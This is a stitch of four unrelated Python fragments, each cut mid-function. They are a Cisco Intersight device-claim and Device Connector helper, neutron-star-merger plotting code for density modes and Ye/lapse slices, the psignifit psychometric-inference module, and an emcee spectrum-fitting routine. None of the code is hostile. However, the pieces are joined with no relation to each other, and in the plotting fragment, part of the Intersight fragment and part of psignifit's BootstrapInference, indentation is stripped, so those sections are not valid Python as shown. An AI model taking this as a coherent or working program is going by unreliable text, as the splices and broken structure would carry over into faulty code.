                ucs_fi_device_console_ip,
                ucs_fi_device_console_login
                )
            if get_ucs_fi_device_connector_system_info.status_code == 200:
                ucs_fi_device_connector_system_info_list = get_ucs_fi_device_connector_system_info.json()
                print("The system information for the Device Connector of "
                      f"{ucs_fi_device_console_ip} has been retrieved.")
                return ucs_fi_device_connector_system_info_list
            else:
                print("\nA configuration error has occurred!\n")
                print("Unable to obtain the system information for the "
                      f"Device Connector of {ucs_fi_device_console_ip}.\n")
                print("Exception Message: ")
                print(get_ucs_fi_device_connector_system_info.json())
        else:
            print("\nA configuration error has occurred!\n")
            # Consistency fix: removed a stray f-prefix from the first,
            # placeholder-free string literal (matches the sibling functions).
            print("Unable to login to the UCS FI Device Console for "
                  f"{ucs_fi_device_console_ip}.\n")
            print("Exception Message: ")
            print(ucs_fi_device_console_login.json())
    except Exception:
        print("\nA configuration error has occurred!\n")
        print("Unable to obtain the system information for the Device "
              f"Connector of {ucs_fi_device_console_ip}.\n")
        print("Exception Message: ")
        traceback.print_exc()
# Establish device claim specific classes and functions
class IntersightDeviceClaim:
    """This class is used to claim a device in Intersight.

    The claim is performed by POSTing the target device's ID (serial number)
    and security token (claim code) to the Intersight asset/DeviceClaims API
    resource.
    """
    object_type = "Intersight Device Claim"
    intersight_api_path = "asset/DeviceClaims"

    def __init__(self,
                 intersight_api_key_id,
                 intersight_api_key,
                 device_id,
                 claim_code,
                 intersight_base_url="https://www.intersight.com/api/v1",
                 preconfigured_api_client=None
                 ):
        """Store the claim parameters and prepare the API client and body.

        Args:
            intersight_api_key_id (str): The ID of the Intersight API key.
            intersight_api_key (str): System file path of the Intersight API key.
            device_id (str): The ID (serial number) of the device to claim.
            claim_code (str): The claim code (security token) of the device.
            intersight_base_url (str): Base URL for Intersight API paths.
            preconfigured_api_client: Optional pre-built API client; when
                provided, the key ID/file arguments are not used to build one.
        """
        self.intersight_api_key_id = intersight_api_key_id
        self.intersight_api_key = intersight_api_key
        self.device_id = device_id
        self.claim_code = claim_code
        self.intersight_base_url = intersight_base_url
        # Reuse a preconfigured API client when provided; otherwise build one
        # from the supplied key ID and key file.
        if preconfigured_api_client is None:
            self.api_client = get_api_client(api_key_id=intersight_api_key_id,
                                             api_secret_file=intersight_api_key,
                                             endpoint=intersight_base_url
                                             )
        else:
            self.api_client = preconfigured_api_client
        self.intersight_api_body = {
            "SerialNumber": self.device_id,
            "SecurityToken": self.claim_code
            }

    def __repr__(self):
        return (
            f"{self.__class__.__name__}"
            f"('{self.intersight_api_key_id}', "
            f"'{self.intersight_api_key}', "
            f"'{self.device_id}', "
            f"'{self.claim_code}', "
            f"'{self.intersight_base_url}', "
            f"{self.api_client})"
            )

    def __str__(self):
        return f"{self.__class__.__name__} class object for '{self.device_id}'"

    def _post_intersight_object(self):
        """This is a function to configure an Intersight object by
        performing a POST through the Intersight API.
        Returns:
            A string with a statement indicating whether the POST method
            was successful or failed.
        Raises:
            Exception:
                An exception occurred while performing the API call.
                The status code or error message will be specified.
        """
        full_intersight_api_path = f"/{self.intersight_api_path}"
        try:
            # Fix: removed the duplicate 'oAuth2' entry from auth_settings.
            self.api_client.call_api(resource_path=full_intersight_api_path,
                                     method="POST",
                                     body=self.intersight_api_body,
                                     auth_settings=['cookieAuth', 'http_signature', 'oAuth2']
                                     )
            print(f"The configuration of the {self.object_type} "
                  "has completed.")
            return "The POST method was successful."
        except intersight.exceptions.ApiException as error:
            if error.status == 409:
                # 409 Conflict: the object already exists, so retry as an
                # update of the pre-existing object instead.
                existing_intersight_object_name = self.intersight_api_body.get("Name", "object")
                print(f"The targeted {self.object_type} appears to already "
                      "exist.")
                print("An attempt will be made to update the pre-existing "
                      f"{existing_intersight_object_name}...")
                try:
                    existing_intersight_object_moid = intersight_object_moid_retriever(intersight_api_key_id=None,
                                                                                      intersight_api_key=None,
                                                                                      object_name=existing_intersight_object_name,
                                                                                      intersight_api_path=self.intersight_api_path,
                                                                                      object_type=self.object_type,
                                                                                      preconfigured_api_client=self.api_client
                                                                                      )
                    # Update full Intersight API path with the MOID of the existing object
                    full_intersight_api_path_with_moid = f"/{self.intersight_api_path}/{existing_intersight_object_moid}"
                    self.api_client.call_api(resource_path=full_intersight_api_path_with_moid,
                                             method="POST",
                                             body=self.intersight_api_body,
                                             auth_settings=['cookieAuth', 'http_signature', 'oAuth2']
                                             )
                    print(f"The update of the {self.object_type} has "
                          "completed.")
                    print(f"The pre-existing {existing_intersight_object_name} "
                          "has been updated.")
                    return "The POST method was successful."
                except Exception:
                    print("\nA configuration error has occurred!\n")
                    print(f"Unable to update the {self.object_type} under the "
                          "Intersight API resource path "
                          f"'{full_intersight_api_path_with_moid}'.\n")
                    print(f"The pre-existing {existing_intersight_object_name} "
                          "could not be updated.")
                    print("Exception Message: ")
                    traceback.print_exc()
                    return "The POST method failed."
            else:
                print("\nA configuration error has occurred!\n")
                print(f"Unable to configure the {self.object_type} under the "
                      "Intersight API resource path "
                      f"'{full_intersight_api_path}'.\n")
                print("Exception Message: ")
                traceback.print_exc()
                return "The POST method failed."
        except Exception:
            print("\nA configuration error has occurred!\n")
            print(f"Unable to configure the {self.object_type} under the "
                  "Intersight API resource path "
                  f"'{full_intersight_api_path}'.\n")
            print("Exception Message: ")
            traceback.print_exc()
            return "The POST method failed."

    def device_claimer(self):
        """This function claims the targeted device by POSTing the prepared
        API body to Intersight.
        """
        print(f"Configuring the {self.object_type} for "
              f"{self.device_id}...")
        # POST the API body to Intersight
        self._post_intersight_object()
def intersight_device_claimer(
intersight_api_key_id,
intersight_api_key,
device_id,
claim_code,
intersight_base_url="https://www.intersight.com/api/v1",
preconfigured_api_client=None
):
"""This is a function used to claim a device on Cisco Intersight.
Args:
intersight_api_key_id (str):
The ID of the Intersight API key.
intersight_api_key (str):
The system file path of the Intersight API key.
device_id (str):
The ID of the device to be claimed.
claim_code (str):
The claim code of the device to be claimed.
intersight_base_url (str):
Optional; The base URL for Intersight API paths. The default value
is "https://www.intersight.com/api/v1". This value typically only
needs to be changed if using the Intersight Virtual Appliance.
preconfigured_api_client | |
'cmap': 'Blues', 'norm': "log",
'fancyticks': True,
'minorticks': True,
'title': {},
'sharey': False,
'sharex': False, # removes angular citkscitks
'fontsize': 14,
'labelsize': 14
}
#
if plot_x_i == 2:
dunb_dic_xy['cbar'] = {'location': 'bottom -.05 .00', 'label': r'$D_{\rm{unb}}$ [GEO]', # 'fmt': '%.1e',
'labelsize': 14,
'fontsize': 14}
if plot_x_i > 1:
dunb_dic_xz['sharey'] = True
dunb_dic_xy['sharey'] = True
o_plot.set_plot_dics.append(dunb_dic_xz)
o_plot.set_plot_dics.append(dunb_dic_xy)
# ----------------------------------------------------------------------
mask = "x<0"
#
v_n = "Ye"
cmap = "bwr_r"
#
data_arr = d3class.get_data(it, rl, "xz", v_n)
x_arr = d3class.get_data(it, rl, "xz", "x")
z_arr = d3class.get_data(it, rl, "xz", "z")
ye_dic_xz = {'task': 'colormesh', 'ptype': 'cartesian', 'aspect': 1.,
'xarr': x_arr, "yarr": z_arr, "zarr": data_arr,
'position': (1, plot_x_i), # 'title': '[{:.1f} ms]'.format(time_),
'cbar': {},
'fill_vmin': False, # fills the x < vmin with vmin
'v_n_x': 'x', 'v_n_y': 'z', 'v_n': v_n,
'xmin': xmin, 'xmax': xmax, 'ymin': zmin, 'ymax': zmax, 'vmin': 0.05, 'vmax': 0.5,
'xscale': None, 'yscale': None,
'mask': mask, 'cmap': cmap, 'norm': None,
'fancyticks': True,
'minorticks': True,
'title': {},#{"text": r'$t-t_{merg}:$' + r'${:.1f}$ [ms]'.format((t - tmerg) * 1e3), 'fontsize': 14},
'sharey': False,
'sharex': True, # removes angular citkscitks
'fontsize': 14,
'labelsize': 14
}
#
data_arr = d3class.get_data(it, rl, "xy", v_n)
x_arr = d3class.get_data(it, rl, "xy", "x")
y_arr = d3class.get_data(it, rl, "xy", "y")
ye_dic_xy = {'task': 'colormesh', 'ptype': 'cartesian', 'aspect': 1.,
'xarr': x_arr, "yarr": y_arr, "zarr": data_arr,
'position': (2, plot_x_i), # 'title': '[{:.1f} ms]'.format(time_),
'cbar': {},
'fill_vmin': False, # fills the x < vmin with vmin
'v_n_x': 'x', 'v_n_y': 'y', 'v_n': v_n,
'xmin': xmin, 'xmax': xmax, 'ymin': ymin, 'ymax': ymax, 'vmin': 0.01, 'vmax': 0.5,
'xscale': None, 'yscale': None,
'mask': mask, 'cmap': cmap, 'norm': None,
'fancyticks': True,
'minorticks': True,
'title': {},
'sharey': False,
'sharex': False, # removes angular citkscitks
'fontsize': 14,
'labelsize': 14
}
#
if plot_x_i == 3:
ye_dic_xy['cbar'] = {'location': 'bottom -.05 .00', 'label': r'$Y_e$', 'fmt': '%.1f',
'labelsize': 14,
'fontsize': 14}
if plot_x_i > 1:
ye_dic_xz['sharey'] = True
ye_dic_xy['sharey'] = True
o_plot.set_plot_dics.append(ye_dic_xz)
o_plot.set_plot_dics.append(ye_dic_xy)
# ----------------------------------------------------------
tcoll = d1class.get_par("tcoll_gw")
if not np.isnan(tcoll) and t >= tcoll:
print(tcoll, t)
v_n = "lapse"
mask = "z>0.15"
data_arr = d3class.get_data(it, rl, "xz", v_n)
x_arr = d3class.get_data(it, rl, "xz", "x")
z_arr = d3class.get_data(it, rl, "xz", "z")
lapse_dic_xz = {'task': 'colormesh', 'ptype': 'cartesian', 'aspect': 1.,
'xarr': x_arr, "yarr": z_arr, "zarr": data_arr,
'position': (1, plot_x_i), # 'title': '[{:.1f} ms]'.format(time_),
'cbar': {},
'v_n_x': 'x', 'v_n_y': 'z', 'v_n': v_n,
'xmin': xmin, 'xmax': xmax, 'ymin': zmin, 'ymax': zmax, 'vmin': 0., 'vmax': 0.15,
'fill_vmin': False, # fills the x < vmin with vmin
'xscale': None, 'yscale': None,
'mask': mask, 'cmap': 'Greys', 'norm': None,
'fancyticks': True,
'minorticks': True,
'title': {},#,{"text": r'$t-t_{merg}:$' + r'${:.1f}$ [ms]'.format((t - tmerg) * 1e3),
#'fontsize': 14},
'sharey': False,
'sharex': True, # removes angular citkscitks
'fontsize': 14,
'labelsize': 14
}
#
data_arr = d3class.get_data(it, rl, "xy", v_n)
# print(data_arr.min(), data_arr.max()); exit(1)
x_arr = d3class.get_data(it, rl, "xy", "x")
y_arr = d3class.get_data(it, rl, "xy", "y")
lapse_dic_xy = {'task': 'colormesh', 'ptype': 'cartesian', 'aspect': 1.,
'xarr': x_arr, "yarr": y_arr, "zarr": data_arr,
'position': (2, plot_x_i), # 'title': '[{:.1f} ms]'.format(time_),
'cbar': {},
'v_n_x': 'x', 'v_n_y': 'y', 'v_n': v_n,
'xmin': xmin, 'xmax': xmax, 'ymin': ymin, 'ymax': ymax, 'vmin': 0, 'vmax': 0.15,
'fill_vmin': False, # fills the x < vmin with vmin
'xscale': None, 'yscale': None,
'mask': mask, 'cmap': 'Greys', 'norm': None,
'fancyticks': True,
'minorticks': True,
'title': {},
'sharey': False,
'sharex': False, # removes angular citkscitks
'fontsize': 14,
'labelsize': 14
}
#
# if plot_x_i == 1:
# rho_dic_xy['cbar'] = {'location': 'bottom -.05 .00', 'label': r'$\rho$ [GEO]', # 'fmt': '%.1e',
# 'labelsize': 14,
# 'fontsize': 14}
if plot_x_i > 1:
lapse_dic_xz['sharey'] = True
lapse_dic_xy['sharey'] = True
o_plot.set_plot_dics.append(lapse_dic_xz)
o_plot.set_plot_dics.append(lapse_dic_xy)
plot_x_i += 1
o_plot.main()
exit(0)
''' density modes '''
def plot_desity_modes():
    """Plot the m=1 (solid) and m=2 (dotted) density-mode magnitudes versus
    post-merger time for a hard-coded set of simulations.

    Each mode amplitude C_m is normalized by the m=0 amplitude (norm_to_m=0).
    The figure is written via PLOT_MANY_TASKS; the interpreter exits
    afterwards (script-style workflow).
    """
    sims = ["DD2_M13641364_M0_SR", "DD2_M13641364_M0_LK_SR_R04", "DD2_M15091235_M0_LK_SR", "LS220_M14691268_M0_LK_SR"]
    lbls = ["DD2", "DD2 136 136", "DD2 151 124", "LS220 147 127"]
    ls_m1 = ["-", "-", "-", "-"]
    ls_m2 = [":", ":", ":", ":"]
    colors = ["black", "green", "blue", "red"]
    lws_m1 = [1., 1., 1., 1.]
    lws_m2 = [0.8, 0.8, 0.8, 0.8]
    alphas = [1., 1., 1., 1.]
    # Mode index used for normalization (C_m / C_0).
    norm_to_m = 0
    #
    o_plot = PLOT_MANY_TASKS()
    o_plot.gen_set["figdir"] = Paths.plots + "all2/"
    o_plot.gen_set["type"] = "cartesian"
    o_plot.gen_set["figsize"] = (9.0, 2.7)  # <->, |]
    o_plot.gen_set["figname"] = "dm_dd2_dd2_ls220.png"
    o_plot.gen_set["sharex"] = False
    o_plot.gen_set["sharey"] = False
    o_plot.set_plot_dics = []
    #
    for sim, lbl, ls1, ls2, color, lw1, lw2, alpha in zip(sims, lbls, ls_m1, ls_m2, colors, lws_m1, lws_m2, alphas):
        o_dm = LOAD_DENSITY_MODES(sim)
        o_dm.gen_set['fname'] = Paths.ppr_sims + sim + "/" + "profiles/" + "density_modes_lap15.h5"
        o_par = ADD_METHODS_ALL_PAR(sim)
        tmerg = o_par.get_par("tmerg")
        # m=1 mode magnitude, normalized by the m=0 mode.
        mags1 = o_dm.get_data(1, "int_phi_r")
        mags1 = np.abs(mags1)
        if norm_to_m is not None:  # identity check (was `!= None`)
            norm_int_phi_r1d = o_dm.get_data(norm_to_m, 'int_phi_r')
            mags1 = mags1 / abs(norm_int_phi_r1d)[0]
        times = o_dm.get_grid("times")
        print(mags1)
        # Shift to post-merger time in milliseconds.
        times = (times - tmerg) * 1e3  # ms
        densmode_m1 = {
            'task': 'line', 'ptype': 'cartesian',
            'xarr': times, 'yarr': mags1,
            'position': (1, 1),
            'v_n_x': 'times', 'v_n_y': 'int_phi_r abs',
            'ls': ls1, 'color': color, 'lw': lw1, 'ds': 'default', 'alpha': alpha,
            'label': lbl, 'ylabel': r'$C_m/C_0$ Magnitude', 'xlabel': Labels.labels("t-tmerg"),
            'xmin': 45, 'xmax': 110, 'ymin': 1e-5, 'ymax': 1e-1,
            'xscale': None, 'yscale': 'log', 'legend': {},
            'fancyticks': True, 'minorticks': True,
            'fontsize': 14,
            'labelsize': 14
        }
        # m=2 mode magnitude, normalized the same way.
        mags2 = o_dm.get_data(2, "int_phi_r")
        mags2 = np.abs(mags2)
        if norm_to_m is not None:  # identity check (was `!= None`)
            norm_int_phi_r1d = o_dm.get_data(norm_to_m, 'int_phi_r')
            mags2 = mags2 / abs(norm_int_phi_r1d)[0]
        densmode_m2 = {
            'task': 'line', 'ptype': 'cartesian',
            'xarr': times, 'yarr': mags2,
            'position': (1, 1),
            'v_n_x': 'times', 'v_n_y': 'int_phi_r abs',
            'ls': ls2, 'color': color, 'lw': lw2, 'ds': 'default', 'alpha': alpha,
            'label': None, 'ylabel': r'$C_m/C_0$ Magnitude', 'xlabel': Labels.labels("t-tmerg"),
            'xmin': 45, 'xmax': 110, 'ymin': 1e-5, 'ymax': 1e-1,
            'xscale': None, 'yscale': 'log',
            'fancyticks': True, 'minorticks': True,
            'legend': {'loc': 'best', 'ncol': 1, 'fontsize': 12},
            'fontsize': 14,
            'labelsize': 14
        }
        o_plot.set_plot_dics.append(densmode_m1)
        o_plot.set_plot_dics.append(densmode_m2)
    #
    o_plot.main()
    exit(1)
def plot_desity_modes2():
_fpath = "slices/" + "rho_modes.h5" #"profiles/" + "density_modes_lap15.h5"
sims = ["DD2_M13641364_M0_SR", "DD2_M13641364_M0_LK_SR_R04"]
lbls = ["DD2 136 136" , "DD2 136 136 LK"]
ls_m1 = ["-", "-"]
ls_m2 = [":", ":"]
colors = ["green", "orange"]
lws_m1 = [1., 1.,]
lws_m2 = [0.8, 0.8]
alphas = [1., 1.]
#
norm_to_m = 0
#
o_plot = PLOT_MANY_TASKS()
o_plot.gen_set["figdir"] = Paths.plots + "all2/"
o_plot.gen_set["type"] = "cartesian"
o_plot.gen_set["figsize"] = (9.0, 3.6) # <->, |]
o_plot.gen_set["figname"] = "dm_dd2_dd2_ls220.png"
o_plot.gen_set["sharex"] = False
o_plot.gen_set["sharey"] = False
o_plot.gen_set["subplots_adjust_h"] = 0.2
o_plot.gen_set["subplots_adjust_w"] = 0.0
o_plot.set_plot_dics = []
#
#
for sim, lbl, ls1, ls2, color, lw1, lw2, alpha in zip(sims, lbls, ls_m1, ls_m2, colors, lws_m1, lws_m2, alphas):
o_dm = LOAD_DENSITY_MODES(sim)
o_dm.gen_set['fname'] = Paths.ppr_sims+sim+"/"+ _fpath
o_par = ADD_METHODS_ALL_PAR(sim)
tmerg = o_par.get_par("tmerg")
#
mags1 = o_dm.get_data(1, "int_phi_r")
mags1 = np.abs(mags1)
if norm_to_m != None:
# print('Normalizing')
norm_int_phi_r1d = o_dm.get_data(norm_to_m, 'int_phi_r')
# print(norm_int_phi_r1d); exit(1)
mags1 = mags1 / abs(norm_int_phi_r1d)[0]
times = o_dm.get_grid("times")
#
print(mags1)
#
times = (times - tmerg) * 1e3 # ms
#
densmode_m1 = {
'task': 'line', 'ptype': 'cartesian',
'xarr': times, 'yarr': mags1,
'position': (1, 1),
'v_n_x': 'times', 'v_n_y': 'int_phi_r abs',
'ls': ls1, 'color': 'gray', 'lw': lw1, 'ds': 'default', 'alpha': alpha,
'label': None, 'ylabel':None, 'xlabel': Labels.labels("t-tmerg"),
'xmin': -10, 'xmax': 110, 'ymin': 1e-4, 'ymax': 5e-1,
'xscale': None, 'yscale': 'log', 'legend': {},
'fancyticks': True, 'minorticks': True,
'fontsize': 14,
'labelsize': 14
}
#
mags2 = o_dm.get_data(2, "int_phi_r")
mags2 = np.abs(mags2)
if norm_to_m != None:
# print('Normalizing')
norm_int_phi_r1d = o_dm.get_data(norm_to_m, 'int_phi_r')
# print(norm_int_phi_r1d); exit(1)
mags2 = mags2 / abs(norm_int_phi_r1d)[0]
# times = (times - tmerg) * 1e3 # ms
# print(mags2); exit(1)
densmode_m2 = {
'task': 'line', 'ptype': 'cartesian',
'xarr': times, 'yarr': mags2,
'position': (1, 1),
'v_n_x': 'times', 'v_n_y': 'int_phi_r abs',
'ls': ls2, 'color': 'gray', 'lw': lw2, 'ds': 'default', 'alpha': alpha,
'label': None, 'ylabel': r'$C_m/C_0$', 'xlabel': Labels.labels("t-tmerg"),
'xmin': 0, 'xmax': 110, 'ymin': 1e-4, 'ymax': 5e-1,
'xscale': None, 'yscale': 'log',
'fancyticks': True, 'minorticks': True,
'legend': {},
'fontsize': 14,
'labelsize': 14,
'title':{'text':"Density Mode Evolution", 'fontsize':14}
# 'sharex': True
}
#
if sim == sims[0]:
densmode_m1['label'] = r"$m=1$"
densmode_m2['label'] = r"$m=2$"
o_plot.set_plot_dics.append(densmode_m1)
o_plot.set_plot_dics.append(densmode_m2)
#
# ---
#
densmode_m1 = {
'task': 'line', 'ptype': 'cartesian',
'xarr': times, 'yarr': mags1,
'position': (1, 1),
'v_n_x': 'times', 'v_n_y': 'int_phi_r abs',
'ls': ls1, | |
#!/usr/bin/env python
# vi: set ft=python sts=4 ts=4 sw=4 et:
######################################################################
#
# See COPYING file distributed along with the psignifit package for
# the copyright and license terms
#
######################################################################
__docformat__ = "restructuredtext"
import sys,os,re
import operator
import numpy as N
import pylab as p
from scipy import stats,special,optimize
import pypsignifit
from pypsignifit import psignipriors
interface = pypsignifit.interface
import swignifit.swignifit_raw as sft
import swignifit.utility as sfu
import pygibbsit
from psignierrors import NosamplesError
__all__ = ["BootstrapInference","BayesInference","ASIRInference"]
__doc__ = """
This module contains data objects to store psychophysical data and perform inference on them. Two general approaches
have been suggested to fit psychometric functions
1. *Constrained maximum likelihood (Wichmann & Hill, 2001a,b)* This procedure starts by fitting a psychometric function
to the data and then performs parametric bootstrap to obtain confidence intervals for parameters, associated
thresholds,... This approach is implemented by the :BootstrapInference: class.
2. *Bayesian Inference (Kuss et al., 2005)* This procedure starts with a number of prior distributions for each of
the models parameters and then uses Bayes rule to derive the posterior distribution from the data. As the
posterior distribution can only be determined up to a normalization constant, inference on the posterior distribution
has to be based on samples. These samples are typically obtained using Markov Chain Monte Carlo (MCMC). This
approach is implemented in the :BayesInference: class.
The module also defines a :PsiInference: base class.
"""
warnred = [.7,0,0]
# Checking keyword arguments
def check_kwargs ( kwargs, docstring ):
    """Check that a kwargs dictionary only contains documented keywords.

    The docstring must contain a reST ``:Parameters:`` section in which
    every accepted parameter appears as ``*name* :``.

    :Parameters:
        *kwargs* :
            dictionary of keyword arguments to validate
        *docstring* :
            docstring (reST format) documenting the accepted parameters

    :Returns:
        0 if every key in *kwargs* is documented, otherwise the first
        undocumented key that was encountered.

    :Raises:
        ValueError if *docstring* contains no ``:Parameters:`` section.
    """
    parametersection = re.search ( r":Parameters:(.*)(:\w+:|$)", docstring, re.DOTALL )
    if parametersection is None:
        # Call form of raise is valid on both Python 2 and 3; the original
        # "raise ValueError, msg" statement is Python-2-only syntax.
        raise ValueError("Docstring does not contain a parameter section")
    parameters = re.findall ( r"\*(\w+)\* :", parametersection.group(1) )
    for k in kwargs:
        if k not in parameters:
            return k
    return 0
# Helper function to create properties with one function
def Property(function):
    """Build a property from a single nested-scope function.

    ``function`` is expected to define local functions named ``fget``,
    ``fset`` and/or ``fdel``; its docstring becomes the property's doc.
    A trace function is installed so that the moment ``function()``
    returns, its frame locals can be harvested and handed to the builtin
    :func:`property`.
    """
    keys = 'fget', 'fset', 'fdel'
    func_locals = {'doc':function.__doc__}
    def probeFunc(frame, event, arg):
        # Fired for every interpreter event; we only act when ``function``
        # returns, at which point its locals are fully populated.
        if event == 'return':
            locals = frame.f_locals
            func_locals.update(dict((k,locals.get(k)) for k in keys))
            sys.settrace(None)  # uninstall the trace hook again
        return probeFunc
    sys.settrace(probeFunc)
    function()  # run purely for its side effect of defining fget/fset/fdel
    return property(**func_locals)
##############################################################################################################################
class PsiInference ( object ):
    """Base class for psychometric inference objects.

    Stores the model specification (sigmoid, core, priors, number of
    alternatives), the current parameter estimate and goodness-of-fit
    quantities, plus a dictionary of plotting defaults.  Subclasses such
    as BootstrapInference attach real data and estimates.
    """
    def __init__ ( self, plotting=None ):
        """Initialize an empty inference object with default model settings.

        :Parameters:
            *plotting* :
                dictionary of plotting parameters (supported keys:
                'label', 'color', 'linestyle', 'marker', 'linewidth');
                missing entries are filled with defaults
        """
        self.data = None
        self.model = {
                "sigmoid": "logistic",
                "core": "ab",
                "priors": None,
                "nafc": 2,
                "gammaislambda": False
                }
        self.estimate = None
        self.deviance = None
        self.devianceresiduals = None
        self.Rpd = None
        self.Rkd = None
        self.__outl = None
        self.__infl = None
        if plotting is None:
            self.__plotting = {}
        else:
            self.__plotting = plotting
        defaults = {"label": "Psychometric function fit","color": "b", "linestyle": "-", "marker": "o", "linewidth": 1 }
        for k in defaults.keys():
            self.__plotting.setdefault ( k, defaults[k] )
        # Build a dummy dataset/psychometric-function pair so that methods
        # such as evaluate() work before any real data are attached.
        self._data,self._pmf,self.nparams = sfu.make_dataset_and_pmf (
                [[1,2,3]], self.model["nafc"], self.model["sigmoid"], self.model["core"], self.model["priors"], gammaislambda=self.model["gammaislambda"] )
    def evaluate ( self, x, prm=None ):
        """Evaluate the psychometric function model at positions given by x.

        :Parameters:
            *x* :
                scalar or sequence of stimulus intensities
            *prm* :
                parameter vector at which to evaluate the model;
                defaults to the current estimate

        :Returns:
            numpy array with the model values at the positions in x
        """
        # Use 'is None' rather than '== None': prm may be a numpy array,
        # for which '==' broadcasts elementwise instead of giving a bool.
        if prm is None:
            prm = self.estimate
        if not operator.isSequenceType ( x ):
            x = [x]
        return N.array ( [self._pmf.evaluate ( xx, prm ) for xx in x] )
    def getThres ( self, cut=0.5 ):
        """Return the stimulus intensity at which performance equals cut.

        Raises NotImplementedError when no data have been attached yet.
        """
        if self.data is None:
            raise NotImplementedError
        return float(self._pmf.getThres ( self.estimate, cut ))
    def getSlope ( self, cut=0.5 ):
        """Return the slope of the psychometric function at threshold cut.

        Raises NotImplementedError when no data have been attached yet.
        """
        if self.data is None:
            raise NotImplementedError
        return float ( self._pmf.getSlope ( self.estimate, self.getThres(cut) ))
    def __repr__ ( self ):
        return "< PsiInference object >"
    desc = property ( fget=lambda self: "sigmoid: %(sigmoid)s\ncore: %(core)s\nnAFC: %(nafc)d" % self.model,
            doc="A short description of the employed model")
    outl = property ( fget=lambda self: self.__outl, doc="A boolean array indicating whether or not a block was an outlier" )
    infl = property ( fget=lambda self: self.__infl, doc="A boolean array indicating whether or not a block was an influential observation" )
    @Property
    def label ():
        "Condition label used in plots"
        def fget ( self ):
            return self.__plotting["label"]
        def fset ( self, v ):
            self.__plotting["label"] = v
    @Property
    def color ():
        "Color used in plots"
        def fget ( self ):
            return self.__plotting["color"]
        def fset ( self, v ):
            self.__plotting["color"] = v
    @Property
    def linestyle ():
        "Linestyle used in plots"
        def fget ( self ):
            return self.__plotting["linestyle"]
        def fset ( self, v ):
            self.__plotting["linestyle"] = v
    @Property
    def linewidth ():
        "Linewidth used in plots"
        def fget ( self ):
            return self.__plotting["linewidth"]
        # BUG FIX: fset previously had signature (self) only and assigned
        # the undefined name 'v', so setting .linewidth raised an error.
        def fset ( self, v ):
            self.__plotting["linewidth"] = v
    @Property
    def marker ():
        "Data marker used in plots"
        def fget ( self ):
            return self.__plotting["marker"]
        def fset ( self, v ):
            self.__plotting["marker"] = v
    def __getstate__ ( self ):
        """Pickling support: drop the swig-wrapped dataset and pmf objects."""
        state = self.__dict__.copy()
        del state['_pmf']
        del state['_data']
        return state
    def __setstate__ ( self, state ):
        """Unpickling support: rebuild dataset and pmf from self.data."""
        self.__dict__.update(state)
        self._data,self._pmf,self.nparams = sfu.make_dataset_and_pmf (
                self.data, self.model["nafc"], self.model["sigmoid"], self.model["core"], self.model["priors"], gammaislambda=self.model["gammaislambda"] )
##############################################################################################################################
class BootstrapInference ( PsiInference ):
def __init__ ( self, data, sample=False, cuts=(.25,.5,.75), conf=(.025,.975), plotprm=None, **kwargs ):
"""Set up an object of bootstrapped data
:Parameters:
*data* :
an array or a list of lists containing stimulus intensities in the
first column, number of correct responses (nAFC) or number of YES-
responses in the second column, and number of trials in the third
column. Each row should correspond to one experimental block. In
addition, the sequence of the rows is taken as the sequence of
            data acquisition. Alternatively, the relative frequencies of correct
responses resp YES responses can be given.
*sample* :
if sample is True, bootstrap samples are drawn. If sample is an
integer, it gives the number of samples that are drawn
*sigmoid* :
shape of the sigmoid function. Valid choices are
- 'logistic' (1+exp(-x))**-1 [Default]
- 'gauss' Phi(x)
- 'gumbel_l' 1 - exp(-exp(x))
- 'gumbel_r' exp(-exp(-x))
- 'exponential' x>0: 1 - exp(-x); else: 0
- 'cauchy' atan(x)/pi + 0.5
- 'id' x; only useful in conjunction with NakaRushton core
*core* :
term inside the sigmoid function. Valid choices are
- 'ab' (x-a)/b [Default]
- 'mw%g' midpoint and width, with "%g" a number larger than 0 and less than 0.5.
mw%g corresponds to a parameterization in terms of midpoint and width of
the rising part of the sigmoid. This width is defined as the length of the
interval on which the sigmoidal part reaches from "%g" to 1-"%g".
- 'linear' a+b*x
- 'log' a+b*log(x)
- 'weibull' 2*s*m*(log(x)-log(m))/log(2) + log(log(2))
This will give you a weibull if combined with the gumbel_l sigmoid and a
reverse weibull if combined with the gumbel_r sigmoid.
- 'poly' (x/a)**b Will give you a weibull if combined with an exp sigmoid
- 'NakaRushton' The Naka-Rushton nonlinearity; should only be used with an id core
*priors* :
a list of prior names. Valid choices are
- 'Uniform(%g,%g)' Uniform distribution on an interval
- 'Gauss(%g,%g)' Gaussian distribution with mean and standard deviation
- 'Beta(%g,%g)' Beta distribution
- 'Gamma(%g,%g)' Gamma distribution
- 'nGamma(%g,%g)' Gamma distribution on the negative axis
- 'invGamma(%g,%g)' inverse Gamma distribution
- 'ninvGamma(%g,%g)' inverse Gamma distribution on the negative axis
If no valid prior is selected, the parameter remains unconstrained.
Alternatively, priors can be given as a dictionary that only specifies
priors for those parameters you want to set in that case you can use
'a','b','m','w','guess','gamma','lapse','lambda' as keys.
*nafc* :
number of response alternatives. If nafc==1, this indicates a Yes/No
task
*cuts* :
performance values that should be considered 'thresholds'. This means that a
'cut' of 0.5 corresponds to an expected performance of roughly 75%% correct in
a 2AFC task.
*conf* :
limits of confidence intervals. The default gives 95%% confidence intervals.
Any other sequence can be used alternatively. In addition, conf can be 'v1.0'
to give the default values of the classical psignifit version (i.e. .023,.159,.841,.977,
corresponding to -2,-1,1,2 standard deviations for a gaussian).
*parametric* :
a boolean indicating wether or not parametric bootstrap should be used
*plotprm* :
a dictionary to take parameters for plotting data. Currently supported are the arguments
'label', 'color', 'linestyle', 'linewidth' and 'marker'. These can all be set after creating
an Inference instance, too. By using the respective properties.
*gammaislambda* :
constrain guessing and lapsing rate to have the same values
:Example:
Estimate | |
is both faster and more
optimal...
Note that if 'spectrum' and 'template' are of different lengths,
the longer one will be trimmed at the end to make the lengths match.
:REQUIREMENTS:
`emcee <http://TBD>`_
"""
#2012-04-25 20:53 IJMC: Created
# 2012-09-23 20:17 IJMC: Now spectrum & template can be different length.
# 2013-03-09 17:23 IJMC: Added nthread option
import emcee
import phasecurves as pc
nlam_s = len(spectrum)
nlam_t = len(template)
if nlam_s <= nlam_t:
template = np.array(template, copy=True)[0:nlam_s]
etemplate = np.array(etemplate, copy=True)[0:nlam_s]
nlam = nlam_s
spectrum_trimmed = False
else: # nlam_s > nlam_t:
spectrum0 = np.array(spectrum, copy=True)
spectrum = spectrum0[0:nlam_t]
wtemplate = np.array(wtemplate, copy=True)[0:nlam_t]
nlam = nlam_t
spectrum_trimmed = True
# Create a normalized vector of coordinates for computing
# normalized polynomials:
dx0 = 1. / (nlam - 1.)
